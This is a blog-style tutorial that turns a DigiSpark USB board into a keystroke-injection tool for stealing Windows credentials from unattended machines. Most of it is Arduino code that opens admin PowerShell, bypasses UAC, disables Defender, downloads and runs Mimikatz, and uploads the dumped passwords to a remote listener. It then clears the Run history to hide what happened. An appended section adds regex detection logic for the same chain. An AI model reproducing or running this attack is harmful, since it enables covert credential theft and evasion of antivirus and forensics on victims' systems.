What’s DigiSpark?
DigiSpark is one of the smallest Arduino development boards, based on an ATtiny85 microcontroller. It runs off USB’s 5V, has about 6 KB of usable flash memory and 6 I/O pins. Its real appeal is that it is cheap and easy to get, yet powerful enough to run weaponized scripts.
The great plan
Program the DigiSpark to perform credential theft from a Windows system as quickly and stealthily as possible. The idea is a fast way to pull credentials from an unattended system by presenting itself to the host as a HID (Human Interface Device, i.e. a keyboard).
The process is as follows:
- Run a PowerShell session as Admin
- Relax the script execution policy
- Disable active scanning for Windows Defender
- Download and execute Mimikatz to pull creds
- Convert the output to a string
- Upload the string to a PHP listener
- Revert AV and policy changes
- Clear leftover logs and files
- Light the LED to signal that it is done
Setting up software
Since DigiSpark is a microcontroller, it requires an IDE with the proper drivers to be programmed.
In this scenario we will be using the Arduino IDE, which is available to download at the following link.
After setting it up, extra board support is required for the DigiSpark:
- Head to File – Preferences
- In the box named “Additional Boards Manager URLs” add the following:
http://digistump.com/package_digistump_index.json
- Click OK
- Head to Tools menu
- Click Boards Manager which is located in Board submenu
- Search for Digistump and install the board package
Now you’re all set!
Connect the DigiSpark and start uploading your code from the Arduino IDE.
Script
#include "DigiKeyboard.h"

void setup() {
  pinMode(1, OUTPUT); // on-board LED for model A
}

void loop() {
  DigiKeyboard.delay(6000); // wait 6 sec before start
  DigiKeyboard.sendKeyStroke(0); // release any held keys
  DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT); // Win + X
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_A); // Run PowerShell as admin
  DigiKeyboard.delay(2000); // Delay for laggy PCs
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // select Yes on the UAC prompt
  DigiKeyboard.sendKeyStroke(KEY_ENTER); // confirm the prompt
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-ExecutionPolicy Unrestricted"); // Enable running scripts
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true"); // Disable Windows Defender
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("cd $ENV:temp"); // Navigate into temp dir
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Invoke-WebRequest -Uri 'Can'tHostAnymore' -OutFile 'mimi.exe'");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file"); // Call Mimikatz to dump system credentials
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("$output = Get-Content dump.file"); // Convert output to a string before upload
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("(New-Object Net.WebClient).UploadString('PHPI'mNotHosting', $output)"); // Upload to listener
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Remove-Item mimi.exe"); // Remove Mimikatz
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-ExecutionPolicy Restricted"); // Revert policy
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $false"); // Enable Windows Defender
  DigiKeyboard.delay(1000);
  // Remove Run prompt history; backslashes are doubled because this is a C string literal
  DigiKeyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("exit"); // Exit PowerShell
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(1, HIGH); // LED indicator, ready to remove
  DigiKeyboard.delay(10000);
}
I think the code is pretty straightforward and the comments are simple; the listener script is available at the repository. (Update: the repo has been removed, message me for the code.)
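As an added defender-side example (not code from the original post), the chain above leaves a distinctive trail in PowerShell Script Block Logging (Event ID 4104): the same commands, typed by a "keyboard" seconds apart from one process. The Python below correlates those indicators over a constructed, flattened sample of such records; the record format, process ids and placeholder URL are assumptions made for the example.

```python
import re
from datetime import datetime, timedelta
# Each indicator is one step of the keystroke-injected chain described above.
INDICATORS = {
    "policy_disabled": re.compile(r"Set-ExecutionPolicy\s+Unrestricted", re.I),
    "defender_disabled": re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I),
    "lsass_dump": re.compile(r"sekurlsa::logonpasswords", re.I),
    "exfil_upload": re.compile(r"\.UploadString\(", re.I),
    "runmru_wipe": re.compile(r"Remove-ItemProperty.*RunMRU", re.I),
}
# Constructed sample (not real telemetry) of Script Block Logging records,
# flattened to "timestamp|process id|script text" for this example.
SAMPLE_LOG = """\
2024-01-01T10:00:00|1234|Get-ChildItem C:\\Users
2024-01-01T10:05:01|4242|Set-ExecutionPolicy Unrestricted
2024-01-01T10:05:02|4242|Set-MpPreference -DisableRealtimeMonitoring $true
2024-01-01T10:05:05|4242|./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file
2024-01-01T10:05:07|4242|(New-Object Net.WebClient).UploadString('http://placeholder.invalid', $output)
2024-01-01T10:05:12|4242|Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*'
2024-01-01T11:30:00|5555|Set-ExecutionPolicy Unrestricted
"""

def parse_records(text):
    """Yield (timestamp, pid, script) from the flattened log format."""
    for line in text.splitlines():
        ts, pid, script = line.split("|", 2)
        yield datetime.fromisoformat(ts), pid, script

def tag_record(script):
    """Return the set of indicator names matched by one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(script)}

def correlate(text, window=timedelta(seconds=60), min_hits=3):
    """Alert per process when at least min_hits distinct indicators land inside one window.
    A lone Set-ExecutionPolicy is admin noise; the whole chain within seconds is the signature."""
    hits = {}  # pid -> list of (timestamp, indicator name)
    for ts, pid, script in parse_records(text):
        for name in tag_record(script):
            hits.setdefault(pid, []).append((ts, name))
    alerts = {}
    for pid, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            names = {n for t, n in events[i:] if t - start <= window}
            if len(names) >= min_hits:
                alerts[pid] = sorted(names)
                break
    return alerts
```

Process 4242 trips all five indicators within eleven seconds and is flagged; process 5555, which only changed the execution policy, is not.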
This is still in early alpha, so expect a lot of changes to be made.
A Bash script for automating the server-side install is still in progress.
Thanks for reading!